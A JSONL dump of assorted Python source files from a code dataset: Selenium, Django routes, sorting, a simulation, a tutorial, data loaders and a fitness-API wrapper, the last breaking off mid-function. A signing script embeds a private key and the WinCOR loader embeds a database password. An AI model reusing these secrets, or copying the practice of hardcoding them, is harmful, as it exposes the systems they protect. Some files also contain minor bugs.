\"chrome\": WebDriver = webdriver.Chrome(chromedriver)\nelse: WebDriver = webdriver.Firefox()\n\nWebDriver.get(\"http://www.python.org\")\n\nassert \"Python\" in WebDriver.title\nelem = WebDriver.find_element_by_name(\"q\")\nelem.clear()\nelem.send_keys(\"pycon\")\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in WebDriver.page_source\nWebDriver.close()\nWebDriver.quit()","sub_path":"selenium/automation/examples/test-webdriver.py","file_name":"test-webdriver.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"545315860","text":"# -*- coding: utf-8 -*-\nimport hashlib\nimport requests\nfrom log import logger\nimport json\nclass gensign(object):\n private_key='d082205acf33c732c20411f8391dcd2b'\n msg= {\"assets_id\": \"ZC0150\",\n \"data\": \"{\\\"repayment_schedule_list\\\":[{\\\"repayment_money\\\":\\\"8999.00\\\",\\\"repayment_interests\\\":\\\"97.49\\\",\\\"repayment_time\\\":\\\"2018-09-13\\\",\\\"periods\\\":\\\"1\\\",\\\"repayment_service_charge\\\":\\\"0.00\\\",\\\"current_period\\\":\\\"9096.49\\\"}],\\\"lender_list\\\":[],\\\"loan_info\\\":{\\\"order_no\\\":\\\"ZC20180810164816485799\\\",\\\"financing_order_no\\\":\\\"10test53090\\\",\\\"financing_name\\\":\\\"金蛋理财\\\",\\\"loan_money\\\":\\\"10000.00\\\",\\\"loan_status\\\":\\\"1\\\",\\\"create_time\\\":\\\"2018-08-24\\\",\\\"`\\\":\\\"2018-08-10\\\",\\\"interest_end\\\":\\\"2018-09-10\\\",\\\"periods\\\":1,\\\"repayment_method\\\":2,\\\"borrow_deadline\\\":30,\\\"deadline_unit\\\":1,\\\"interest_rate\\\":\\\"13.00\\\",\\\"interest_rate_type\\\":2,\\\"total_principal\\\":\\\"10000.00\\\",\\\"total_interests\\\":\\\"404.40\\\",\\\"total_service_charge\\\":\\\"0.00\\\",\\\"total_money\\\":\\\"10404.40\\\"},\\\"base_info\\\":{\\\"assets_order_no\\\":\\\"2018081418364600000054\\\",\\\"product_id\\\":\\\"ZC0150-01\\\",\\\"order_status\\\":70}}\",\n \"time\": 1533898087, \"sign\": \"d999736b7ba8f9ba8282ba4ccfcca51e\"}\n def gennoticesign(self):\n s=self.msg[\"assets_id\"]+self.msg[\"time\"].__str__()+self.private_key+self.msg[\"data\"]\n # 创建md5对象\n hl = hashlib.md5()\n hl.update(s.encode(encoding='utf-8'))\n print(s)\n # print(hl.hexdigest().upper())\n rs=hl.hexdigest()\n # rs=hl.digest()\n self.msg[\"sign\"]=rs\n print(rs)\n # print(json.dumps(self.msg))\n print(self.msg)\n return rs\n\n def postmsg(self):\n url='http://10.31.153.170:8087/notice/loan/jd'\n headers=dict()\n headers['Content-Type']='application/json'\n rs=requests.post(url=url,data=self.msg,headers=headers)\n logger.info(rs)\n if rs.status_code=='200':\n logger.info(\"回调结果: \"+rs.text)\n\n\nif __name__=='__main__':\n a=gensign()\n a.gennoticesign()\n# assets_order_no=\"\"\"\n# 2018081414131600000003\n# 2018081414131700000004\n# 2018081414131700000005\n# 2018081414131700000006\n# 2018081414131700000007\n# 2018081414131700000008\n# 2018081414131800000009\n# 2018081414131800000010\n# \"\"\"\n#\n# for i in assets_order_no.splitlines():\n# if i.strip().__len__()>0:\n# print(i.strip())\n # pass","sub_path":"paycenter/financingmng/gensign.py","file_name":"gensign.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"562001938","text":"from django.conf.urls import url\nfrom django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom siphoner_app import views\n\nurlpatterns = [\n url(r'^api/$', views.api_root),\n url(r'^api/nws-offices/$', views.NWSOfficeList.as_view(), name='nws-office-list'),\n url(r'^api/nws-stations/$', views.NWSObservationStationList.as_view(), name='nws-station-list'),\n url(r'^api/nws-gridpoints/$', views.NWSGridPointList.as_view(), name='nws-gridpoint-list'),\n url(r'^api/nws-units/$', views.NWSUnitList.as_view(), name='nws-unit-list'),\n url(r'^api/nws-variables/$', views.NWSVariableList.as_view(), name='nws-variable-list'),\n url(r'^api/nws-forecast-sources/$', views.NWSForecastSourceList.as_view(), name='nws-forecast-source-list'),\n url(r'^api/nws-forecasts/$', views.NWSForecastList.as_view(), name='nws-forecast-list'),\n url(\n r'^api/nws-forecasts/latest-time$',\n views.NWSLatestForecastTime.as_view(),\n name='nws-latest-forecast-time'\n ),\n url(\n r'^api/nws-observations/$',\n views.NWSObservationList.as_view(),\n name='nws-observation-list'\n ),\n url(\n r'^api/nws-observations/latest-time$',\n views.NWSLatestObservationTime.as_view(),\n name='nws-latest-observation-time'\n ),\n url(\n r'^api/unidata-forecasts/$',\n views.UnidataForecastList.as_view(),\n name='unidata-forecast-list'\n ),\n url(\n r'^api/unidata-forecasts/gfs/latest-time$',\n views.UnidataGFSLatestForecastTime.as_view(),\n name='unidata-gfs-latest-forecast-time'\n ),\n url(\n r'^api/unidata-forecasts/gefs/latest-time$',\n views.UnidataGEFSLatestForecastTime.as_view(),\n name='unidata-gefs-latest-forecast-time'\n ),\n url(\n r'^api/unidata-forecasts/sref/latest-time$',\n views.UnidataSREFLatestForecastTime.as_view(),\n name='unidata-sref-latest-forecast-time'\n ),\n url(\n r'^api/unidata-forecasts/hrrr/latest-time$',\n views.UnidataHRRRLatestForecastTime.as_view(),\n name='unidata-hrrr-latest-forecast-time'\n ),\n url(\n r'^api/unidata-forecasts/nam/latest-time$',\n views.UnidataNAMLatestForecastTime.as_view(),\n name='unidata-nam-latest-forecast-time'\n ),\n\n path('csrf/', views.csrf),\n path('ping/', views.ping)\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","sub_path":"siphoner_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"642528241","text":"import random\n\n\ndef qsort(array, left, right):\n p = random.choice(array[left:right + 1])\n i, j = left, right\n while i <= j:\n while array[i] < p:\n i += 1\n while array[j] > p:\n j -= 1\n if i <= j:\n array[i], array[j] = array[j], array[i]\n i += 1\n j -= 1\n\n if j > left:\n qsort(array, left, j)\n if right > i:\n qsort(array, i, right)\n\n return array\n\n\narray = [2, 3, 1, 4, 6, 5, 9, 8, 7]\nprint(qsort(array, left=0, right=(len(array) - 1)))\n","sub_path":"С4 Algorithms and Data Structures/Быстрая сортировка.py","file_name":"Быстрая сортировка.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"405606800","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2017-18 Richard Hull and contributors\n# See LICENSE.rst for details.\n\n\"\"\"\nTest helpers.\n\"\"\"\n\nimport os.path\nimport platform\n\ntry:\n from unittest.mock import patch, call, Mock\nexcept ImportError:\n from mock import patch, call, Mock # noqa: F401\n\nimport pytest\n\nfrom PIL import ImageChops, ImageFont\n\n\nrpi_gpio_missing = 'RPi.GPIO is not supported on this platform: {}'.format(\n platform.system())\nspidev_missing = 'spidev is not supported on this platform: {}'.format(\n platform.system())\npyftdi_missing = 'pyftdi is not supported on Python {}'.format(platform.python_version())\n\n\ndef get_reference_file(fname):\n return os.path.abspath(os.path.join(\n os.path.dirname(__file__),\n 'reference',\n fname))\n\n\ndef get_reference_image(fname):\n return get_reference_file(os.path.join('images', fname))\n\n\ndef get_reference_font(fname, fsize=12):\n path = get_reference_file(os.path.join('font', fname))\n return ImageFont.truetype(path, fsize)\n\n\ndef get_spidev():\n try:\n import spidev\n return spidev\n except ImportError:\n pytest.skip(spidev_missing)\n\n\ndef assert_identical_image(reference, target, img_path):\n bbox = ImageChops.difference(reference, target).getbbox()\n assert bbox is None, '{0} is not identical to generated image'.format(\n os.path.basename(img_path))\n\n\ndef i2c_error(path_name, err_no):\n expected_error = OSError()\n expected_error.errno = err_no\n expected_error.filename = path_name\n\n def fake_open(a, b):\n raise expected_error\n return fake_open\n\n\ndef fib(n):\n a, b = 0, 1\n for _ in range(n):\n yield a\n a, b = b, a + b\n","sub_path":"tests/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"473082303","text":"import random\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\n\nR_ON = 255\nW_ON = 100\nOFF = 0\nvals = [R_ON, OFF, W_ON]\nW_birth_rate = 0.02\nR_birth_rate = 0.2\nempty_rate = 1.0 - W_birth_rate - R_birth_rate\nW_birth_chance = 90\nW_die_chance = 6\nR_birth_chance = 10\n\n\ndef random_grid(n):\n return np.random.choice(vals, n*n, p=[R_birth_rate, empty_rate, W_birth_rate]).reshape(n, n)\n\n\ndef update(frameNum, img, grid, n):\n newGrid = grid.copy()\n for i in range(n):\n for j in range(n):\n #If I'm a rabbit\n if grid[i, j] == R_ON:\n empty_spaces = [(x, y) for x in [(i-1) % n, i, (i+1) % n] for y in [(j-1) % n, j, (j+1) % n] if grid[x, y] == OFF]\n wolves_spaces = [(x, y) for x in [(i-1) % n, i, (i+1) % n] for y in [(j-1) % n, j, (j+1) % n] if grid[x, y] == W_ON]\n if wolves_spaces:\n newGrid[i, j] == W_ON\n elif len(empty_spaces) > 0:\n random_move = random.randint(0, len(empty_spaces) - 1) if len(empty_spaces) > 1 else 0\n newGrid[empty_spaces[random_move]] = R_ON\n newGrid[i, j] = OFF\n if random.randint(0, 100) > 100 - R_birth_chance:\n newGrid[i, j] = R_ON\n #If I'm a wolf\n if grid[i, j] == W_ON:\n rabbits_spaces = [(x, y) for x in [(i-1) % n, i, (i+1) % n] for y in [(j-1) % n, j, (j+1) % n] if grid[x, y] == R_ON]\n if not rabbits_spaces:\n if random.randint(0, 100) > 100 - W_die_chance:\n newGrid[i, j] = OFF\n else:\n newGrid[i, j] = OFF\n newGrid[(i + random.randint(-1, 1)) % n, (j + random.randint(-1, 1)) % n] = W_ON\n else:\n random_move = random.randint(0, len(rabbits_spaces) - 1) if len(rabbits_spaces) > 1 else 0\n newGrid[rabbits_spaces[random_move]] = W_ON\n elif grid[i, j] == OFF:\n pass\n img.set_data(newGrid)\n grid[:] = newGrid[:]\n return img\n\n\ndef main():\n n = 100\n update_interval = 70\n grid = random_grid(n)\n\n fig, ax = plt.subplots() #A few decent looking color themes already applied in matplotlib: summer, hot, afmhot, gist_heat\n img = ax.imshow(grid, interpolation='nearest', cmap='hot')\n ani = animation.FuncAnimation(fig, update, fargs=(img, grid, n, ),\n frames=10, interval=update_interval, save_count=50)\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"predator-prey.py","file_name":"predator-prey.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"484609067","text":"# Tutorial Examples for lecture week 3\n# conditionals and loops\n# author: B. Schoen-Phelan\n# date: Oct 2020\n\n\n# some examples taken from or adapted from the ms python course\n# with Susan Ibach and Christopher Harris\n\n# arrays exist but not natively\n# we have to import a module\n# arrays can only be of one type\n# lists can contain items of different types\n\nnames = ['Bianca', 'Bryan', 'Susan']\nprint(names[:1])\nprint(names[-1])\nprint(names[:])\n# names.insert(-1,'Buddy') #does something interesting\n# # do this instead for insert at end:\nnames.insert(len(names), 'Buddy2')\nprint(names)\n\n# looping\nfor name in names:\n print(name)\n\n# looping a number of times with range\nfor i in range(10):\n print(i, end =\" \")\n#\n# #\nmy_list = [10, 20, 30, 40]\nfor i in range(len(my_list)):\n print(my_list[i], end =\" \")\n#\nmy_sum = 0\nfor i in range(1, 11):\n my_sum += i\n\nprint(\"Sum of first 10 natural number :\", my_sum)\n\nfor i in range(2, 26, 2):\n print(i, end =\" \")\n\nprint(list(range(10)))\n\n\n# spot the difference in these examples\n# version 1\nprice = input(\"how much did it cost? \")\nif float(price) >= 1.00:\n tax = 0.07\n print(tax)\nelse:\n tax = 0\n print(tax)\n\n# version 2: difference for larger number\nprice = input(\"how much did it cost? \")\nif float(price) >= 1.00:\n tax = 0.07\n print(tax)\nelse:\n tax = 0\nprint(tax)\n\n# more elegant version 3\nprice = input(\"how much did it cost? \")\nif float(price) >= 1.00:\n tax = 0.07\nelse:\n tax = 0\nprint(tax)\n\n# boolean ifs\ngpa = .85\nlowest_grade = .7\nprize_winner = False\n#\nif (gpa >= .85 and lowest_grade >= .7):\n prize_winner = True\nelse:\n prize_winner = False\n\n\n\n# some time later in the code check\n# we don't use prize_winner == True <- c-ish syntax is frowned upon in Python\n# don't use prize_winner == True\n\nif prize_winner:\n print(\"Special award needs to be printed\")\nelse:\n print(\"no prize needed\")\n\n\n# string comparisons hold lots of potential\n# error sources\n# try input ireland or IRELAND\n# case sensitivity!\nmy_country = input(\"Where are you from?\")\nif my_country == 'Ireland':\n print(\"pot of gold for you\")\nelse:\n print(\"no gold for you\")\n\n# better with conversion\nmy_country = input(\"Where are you from? \")\nif my_country.upper() == 'IRELAND':\n print(\"pot of gold for you\")\nelse:\n print(\"no gold for you\")\n\n# even better with removing space padding\nmy_country = input(\"Where are you from? \")\nif my_country.upper().strip() == 'IRELAND':\n print(\"pot of gold for you\")\nelse:\n print(\"no gold for you\")\n\n# else elif and default option else for\n# Irish VAT rates\n# see what happens if doing or without\nvat_bands = (\"Intra-Community transactions\", \"Vessels and Aircraft\",\n \"Agriculture\", \"Pharmaceuticals\", \"Shows\",\n \"Standard rate\")\nmy_vat = input(\"Which category are you in: \").strip()\n# # nesting of ifs\nif my_vat in vat_bands:\n if my_vat in (\"Intra-Community transactions\",\"Vessels and Aircraft\"):\n tax = 0\n elif my_vat == \"Agriculture\":\n tax = 0.048\n elif my_vat in (\"Pharmaceuticals\", \"Shows\"):\n tax = 0.135\n else:\n tax = 0.23\n print(tax)\nelse:\n print(\"Category does not exist\")\n\n# take input string and calculate the number\n# of digits and the number of characters\n# in the input string\nmy_input = input(\"Enter a sentence: \")\ndigit_counter = 0\nchar_counter = 0\n# #\n#for character in my_input:\n #if character.isdigit():\n #digit_counter = digit_counter + 1\n #elif character.isalpha():\n #char_counter = char_counter + 1\n #else:\n# pass # do nothing, we'll just ignore spaces etc\n#\n#print(\"Number of digits: \", digit_counter)\n#print(\"Number of characters: \", char_counter)\n\n# enumerate\n# count over iterables\nindex = 0\nmy_numbers = [1, 2, 3, 4, 5]\nwhile index < len(my_numbers):\n print(my_numbers[index])\n index += 1\n\n\n# works fine, but now change my_numbers to a non-sequence object\n# like set\n#index = 0\n#my_numbers = {1, 2, 3, 4, 5}\n#while index < len(my_numbers):\n #print(my_numbers[index])\n #index += 1\n\nfruits = (\"apple\", \"banana\", \"pear\")\nmy_iterator = enumerate(fruits)\nprint(type(my_iterator))\nprint(next(my_iterator)) # next() returns the next item in an iterator\n\nfruits = (\"apple\", \"banana\", \"pear\")\nfor index, fruit in enumerate(fruits):\n print(\"index is %d and value is %s \" % (index, fruit))\n\n\n# manually need to keep track of the iterating variable\n# here it is \"i\" if you don't use enumerate()\nfruits = (\"apple\", \"banana\", \"pear\")\ni = 0\n\nfor fruit in fruits:\n print(\"index is %d and value is %s \" % (i, fruit))\n i += 1\n\n\n\n\n\n\n","sub_path":"Labs/tutorial/w3_tutorial.py","file_name":"w3_tutorial.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"336056150","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport datetime\nimport subprocess\nimport mysql.connector\n\nprint('WinCOR masterdata processing started at ' + str(datetime.datetime.now()))\n\ntry:\n\tcnx = mysql.connector.connect(user='pimloader', password='lGClNEeyIU5Lss', database='pim_loader')\nexcept Exception as e:\n\tprint('An error ocurred while trying to connect to pim_loader database: ' + str(e))\n\nmd_add = (\"INSERT INTO tmp_wincor_product (op_type, cod_wincor, cod_family, cod_subfamily, cod_group, cod_subgroup, description, short_desc, pack_size, brand_name, country, active) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\")\ncursor = cnx.cursor()\n\ntry:\n\tincoming_file = open(sys.argv[1], 'r')\n\n\tfor line in incoming_file: \n\t\tline = line.rstrip('\\n')\n\t\tfields = line.split('|')\n\t\tif fields[0] != \"\":\n\t\t\tmd_data = (fields[0], fields[1], fields[2], fields[3], fields[4], fields[5], fields[6], fields[7], fields[8], fields[9], fields[10], fields[11])\n\t\t\tcursor.execute(md_add, md_data)\n\tcnx.commit()\n\tincoming_file.close()\n\n\t# Maintain lt_wincor_product\n\tprint('Maintaining WinCOR products...')\n\tcursor.callproc('sp_wincor_product_maintainer')\n\n\tprint('Creating Master Data interface for file ' + sys.argv[1] + '...')\n\tcursor.callproc('sp_wincor_masterdata_IF')\n\tprint('Master Data interface created for file ' + sys.argv[1])\n\n # Export et_gamma_masterdata_IF table.\n\tcmd_call = ['/bin/exportfromysqltable.sh', '/var/sftp/share/sftp/pim_loader/export/akeneo/export_wincor_masterdata_to_akeneo', 'pim_loader', 'et_wincor_masterdata_IF']\n\tsubprocess.check_call(cmd_call)\n\tprint('WinCOR Master Data table fetched from file ' + sys.argv[1] + ' exported to Akeneo.')\n\n\tcursor.callproc('sp_wincor_product_to_hist')\n\tprint('Information moved to historial tables.')\n\n\tos.rename(sys.argv[1], './processed/' + sys.argv[1])\n\tprint('WinCOR masterdata file ' + sys.argv[1] + ' dumped into pim_loader database and moved to processed folder.')\n\nexcept Exception as e:\n\tprint('An error has ocurred while processing WinCOR masterdata: ' + str(e))\n\tf = open('not_processed/WinCOR_exceptions.log', 'a')\n\tf.write('Error while processing file ' + sys.argv[1] + ' at ' + str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")) + '\\nError message: ' + str(e) + '\\n')\n\tos.rename(sys.argv[1], './not_processed/' + sys.argv[1])\n\tf.write('File ' + sys.argv[1] + ' moved to not_processed folder.\\n')\n\tprint('File ' + sys.argv[1] + ' moved to not_processed folder.')\n\nfinally:\n\tcursor.callproc('sp_wincor_masterdata_tables_truncation')\n\tcursor.close()\n\tcnx.close()\n\tprint('WinCOR masterdata processing ended at ' + str(datetime.datetime.now()))\n","sub_path":"wincor/WinCOR_masterdata_processing.py","file_name":"WinCOR_masterdata_processing.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"412378877","text":"from keras.applications import vgg19, resnet50\nfrom keras import backend as K\nimport cv2\nimport numpy as np\nimport zipfile\nimport os\n\n# init\nimg_nrows = 600\nimg_ncols = 600\nstyle_reference_image_path = './image_base_styles/v2-8e0585aa43edc8a39c8173953a14b276_hd.jpg'\nbase_image_path = './image_base_styles/v2-e2af25d1ce412ebbe3a8ab9d58c3039c_hd.jpg'\n\ncheck_model = 'resnet50'\ncheck_image = 'base'\n\n\ndef preprocess_image(image_path):\n # img = load_img(image_path, target_size=(img_nrows, img_ncols))\n # img = img_to_array(img)\n # img = np.expand_dims(img, axis=0)\n\n img = cv2.imread(image_path, 1)\n img = cv2.resize(img, (img_nrows, img_ncols))\n img = np.array(img)\n img = np.expand_dims(img, axis=0)\n img = vgg19.preprocess_input(img)\n return img\n\n\nbase_image = K.variable(preprocess_image(base_image_path))\nstyle_reference_image = K.variable(preprocess_image(style_reference_image_path))\nprint('image tensor loaded successfully!')\n\ninput_tensor = K.concatenate([base_image,\n style_reference_image], axis=0)\nprint('input tensor created successfully!')\n\n\nif check_model == 'vgg19':\n model = vgg19.VGG19(input_tensor=input_tensor,\n weights='./out_model/vgg19_weights_tf_dim_ordering_tf_kernels_notop.h5', include_top=False)\n f_zip = zipfile.ZipFile('d:/python/neural_style_transfer_data_save/vencent_all/vgg19_'+check_image+'.zip', 'w',\n zipfile.ZIP_STORED)\nelif check_model == 'resnet50':\n model = resnet50.ResNet50(input_tensor=input_tensor,\n weights='./out_model/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5',\n include_top=False)\n f_zip = zipfile.ZipFile('d:/python/neural_style_transfer_data_save/vencent_all/resnet_'+check_image+'.zip', 'w',\n zipfile.ZIP_STORED)\nprint('Model loaded successfully!')\n\noutputs_dict = dict([(layer.name, layer.output) for layer in model.layers])\n\n\nif True:\n f = open('./' + check_model + '_structure.txt', 'w')\n for key in outputs_dict:\n f.write(str(key) + ' ' + str(outputs_dict[key]) + '\\n')\n\n# for key in outputs_dict:\n\n\nfor key in outputs_dict:\n layer_features = outputs_dict[str(key)]\n base_image_features = K.eval(layer_features[0, :, :, :])\n style_image_features = K.eval(layer_features[1, :, :, :])\n i = 0\n while True:\n try:\n channel_image = ((abs(base_image_features[:, :, i]) +\n abs(np.min(base_image_features[:, :, i])))/np.max(base_image_features[:, :, i])) * 255\n cv2.imwrite(r'd:/python/neural_style_transfer_data_save/vencent_all/'+check_model+'/'\n + str(key)+'_'+str(i)+'_channel.jpg',\n channel_image)\n f_zip.write('d:/python/neural_style_transfer_data_save/vencent_all/'+check_model+'/'\n + str(key)+'_'+str(i)+'_channel.jpg')\n os.remove(r'd:/python/neural_style_transfer_data_save/vencent_all/'+check_model+'/'\n + str(key)+'_'+str(i)+'_channel.jpg')\n if i < 1:\n cv2.imwrite(r'd:/python/neural_style_transfer_data_save/vencent_all/' + check_model + '/'\n + str(key) + '_' + str(i) + '_channel.jpg', channel_image)\n i += 1\n except:\n print('there is no more channel')\n break\n\n# f_vgg.close()\nf_zip.close()\n\n# img = base_image_features[:, :, 0:3]\n# channel_1 = img[:, :, 0]\n# channel_2 = img[:, :, 1]\n# channel_3 = img[:, :, 2]\n# cv2.imshow('check_1', cv2.merge([channel_1, channel_2, channel_3]))\n# cv2.imshow('check_2', cv2.merge([channel_1, channel_3, channel_2]))\n# cv2.imshow('check_3', cv2.merge([channel_2, channel_1, channel_3]))\n# cv2.imshow('check_4', cv2.merge([channel_2, channel_3, channel_1]))\n# cv2.imshow('check_5', cv2.merge([channel_3, channel_2, channel_1]))\n# cv2.imshow('check_6', cv2.merge([channel_3, channel_1, channel_2]))\n# cv2.imshow('check_7', cv2.merge([channel_1, channel_1, channel_1]))\n# cv2.imshow('check_8', cv2.merge([channel_2, channel_2, channel_2]))\n# cv2.imshow('check_9', cv2.merge([channel_3, channel_3, channel_3]))\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n","sub_path":"style_tansfer/conv_of_resnet.py","file_name":"conv_of_resnet.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"309698361","text":"import random\n\nimport requests\nfrom pprint import pprint\nimport json\nimport pyramid.httpexceptions as exc\nfrom datetime import date\nimport calendar\nimport toml\n\n\n\nclass WengerApi:\n\n headers1 = {'Accept': 'application/json'\n }\n\n def __init__(self, username, password,token):\n self.username = username\n self.password = password\n self.token = token\n self.header = WengerApi.headers1.copy()\n self.header[\"Authorization\"] = token\n self.login()\n\n def login(self):\n data = {\"username\": {self.username},\n \"password\": {self.password},\n \"submit\": \"Login\"}\n url = 'https://wger.de/en/user/login'\n login_get = requests.get(url=url, headers=self.header)\n self.header['X-CSRFToken'] = login_get.cookies[\"csrftoken\"]\n self.header['Referer'] = url\n session_id = login_get.cookies.get(\"sessionid\")\n csrf_token = login_get.cookies.get(\"csrftoken\")\n cookie_full = f\"csrftoken={csrf_token}; sessionid={session_id}\"\n self.header[\"Cookie\"] = cookie_full\n req = requests.post(url=url, data=data, headers=self.header)\n if req.status_code in [200,201]:\n return req, \"The login was performed successfuly\"\n else:\n return False, f\"Error {req.status_code}\"\n\n def get_req(self,object):\n g1 = requests.get('https://wger.de/api/v2/')\n url = g1.json().get(object)\n if url != None:\n req1 = requests.get(url=url, headers=self.header)\n count = req1.json().get('count')\n url1 = url + f\"?limit={count}&offset=0\"\n g = requests.get(url=url1, headers=self.header)\n if g.status_code == 200:\n return g.json(), f\"The get request for {object} was performed successfully\"\n else:\n return False, \"Couldn't make the request!\"\n else:\n return False, 'Invalid url'\n\n def post_req(self,object, data):\n\n g1 = requests.get('https://wger.de/api/v2/')\n url1 = g1.json().get(object)\n\n if url1 != None:\n req = requests.post(url=url1,data=data,headers=self.header)\n if req.status_code == 201:\n return req, f'The post request for {object} was done successfully'\n else:\n return False, f'Error {req.status_code}'\n else:\n return False, 'Invalid url'\n\n def name_to_id(self, param1,param1_value ,param2, object):\n req = self.get_req(object)\n print(req[0].get('results', []))\n for item in req[0].get('results', []):\n if item.get(param1) == param1_value:\n return item.get(param2), f\"The id for {param1} was provided successfully\"\n\n return False, f\"The item with {param1} doesn't have id\"\n\n\n def delete_req(self,object, id=None):\n\n g1 = requests.get('https://wger.de/api/v2/')\n url1 = g1.json().get(object)\n if url1 != None:\n url = f\"{url1}/{id}\"\n req = requests.delete(url=url, headers=self.header)\n if req.status_code not in (200,202,204):\n return False, f\"The delete for id {id} couldn't be performed\"\n return req, f\"The delete for {object} with id {id} was performed\" \\\n f\"successfully! Status code is {req.status_code}\"\n else:\n return False, \"Error! The URL doesn't exists!\"\n\n def create_weight_entry(self,date,value):\n\n data = {\n \"date\":date,\n \"weight\":value,\n }\n\n return self.post_req('weightentry',data)\n\n def create_nutrition_plan(self,description=None):\n\n if description == None:\n my_date = date.today()\n description = calendar.day_name[my_date.weekday()]\n data = {\n 'description': description\n }\n return self.post_req('nutritionplan', data)\n\n def create_meals_for_nutrition_plans(self,plan,time=None):\n\n data = {\n 'plan': plan,\n 'time':time\n }\n return self.post_req('meal',data)\n\n def add_meal_item(self,meal,ingredient,amount):\n\n data = {\n 'meal':meal,\n 'ingredient':ingredient,\n 'amount':amount\n }\n\n return self.post_req('mealitem',data)\n\n def add_workout_day(self,name,description):\n\n data = {\n\n \"name\":name,\n \"description\":description\n }\n\n return self.post_req('workout',data)\n\n def add_day(self,training,description,day):\n\n workouts = self.get_req('workout')\n list_of_workout = list()\n workouts_list = workouts[0].get('results')\n if workouts_list != None:\n\n for workout in workouts_list:\n list_of_workout.append(workout[\"id\"])\n\n if training not in list_of_workout:\n return False, f\"The training with id {training} doesn't exists!\"\n data ={\n\n \"training\":training,\n \"description\":description,\n \"day\":day\n }\n return self.post_req('day',data)\n\n def add_exercise(self,exerciseday,sets,order):\n\n data = {\n 'exerciseday': exerciseday,\n 'sets': sets,\n 'order': order\n }\n\n return self.post_req('set',data)\n\n def setting_exercise_set(self, set, exercise,repetition_unit,reps,weight,weight_unit,rir):\n\n data = {\n 'set':set,\n 'exercise':exercise,\n 'repetition_unit':repetition_unit,\n 'reps':reps,\n 'weight':weight,\n 'weight_unit':weight_unit,\n 'rir':rir,\n }\n\n return self.post_req('setting',data)\n\n\n def add_exercise_one_method(self,exercises,sets):\n keys = list()\n for exercise in exercises:\n for i in range(sets):\n keys.append(f'exercise{exercise}-{i}-reps')\n keys.append(f'exercise{exercise}-{i}-repetition_unit')\n keys.append(f'exercise{exercise}-{i}-weight')\n keys.append(f'exercise{exercise}-{i}-weight_unit')\n keys.append(f'exercise{exercise}-{i}-rir')\n\n return keys\n\n\n def add_schedule(self,name,start_date,is_active,is_loop):\n\n data = {\n 'name':name,\n 'start_date':start_date,\n 'is_active':is_active,\n 'is_loop':is_loop\n\n }\n return self.post_req('schedule',data)\n\n def add_workout_to_schedule(self,schedule,workout,duration):\n\n data = {\n 'schedule':schedule,\n 'workout':workout,\n 'duration':duration\n }\n\n return self.post_req('schedulestep',data)\n\n\n def get_random_id(self,object):\n object_req = self.get_req(object)\n list_of_ids = list()\n if object_req[0]:\n for elem in object_req[0].get('results'):\n list_of_ids.append(elem.get('id'))\n return random.choice(list_of_ids)\n\n\n def delete_workout(self, id=None):\n\n workouts = self.get_req('workout')\n list_of_id = list()\n for workout in workouts[0].get('results',[]):\n list_of_id.append(workout.get('id'))\n if id is not None:\n if id in list_of_id:\n req = self.delete_req('workout',id)\n return req, f\"Workout with id {id} was deleted successfully \"\n else:\n return False, f\"Workout with id {id} was not found!\"\n else:\n if len(list_of_id) != 0:\n undeleted_workouts = list()\n for id1 in list_of_id:\n req2 = self.delete_req('workout',id1)\n if req2 is False:\n undeleted_workouts.append(id1)\n if len(undeleted_workouts) == 0:\n return True, \"All existing workouts has been deleted!\"\n else:\n return undeleted_workouts, f\"The following workouts couldn't be deleted {undeleted_workouts}\"\n else:\n return False, \"There are no workouts to be deleted\"\n\n def delete_all_nutrition_plans(self):\n nutrition_plans = self.get_req('nutritionplan')\n for nutrition_plan in nutrition_plans[0].get('results',[]):\n req = self.delete_req('nutritionplan',nutrition_plan.get('id'))\n if req[0] is False:\n return req[0]\n return True\n\n def delete_all_meals_from_nutrition_plan(self):\n meals = self.get_req('meal')\n for meal in meals[0].get('results',[]):\n req = self.delete_req('meal',meal.get('id'))\n if req[0] is False:\n return False\n return True\n\n def delete_all_items_from_meal(self):\n items = self.get_req('mealitem')\n for item in items[0].get('results',[]):\n req = self.delete_req('mealitem',item.get('id'))\n\n if req[0] is False:\n return False\n return True\n\n\n def delete_exercise(self, workout_id = None, day_id = None, exercise_id = None):\n if workout_id is not None:\n list_of_workouts = self.get_req('workout')\n list_of_workouts_ids = list()\n for workout in list_of_workouts.get('results',[]):\n list_of_workouts_ids.append(workout.get('id'))\n\n if day_id is not None:\n list_of_days = self.get_req('day')\n list_of_days_id = list()\n for day in list_of_days.get('results',[]):\n list_of_days_id.append(day.get('id'))\n\n if exercise_id is not None:\n list_of_exercises = self.get_req('set')\n list_of_exercises_ids = list()\n for exercise in 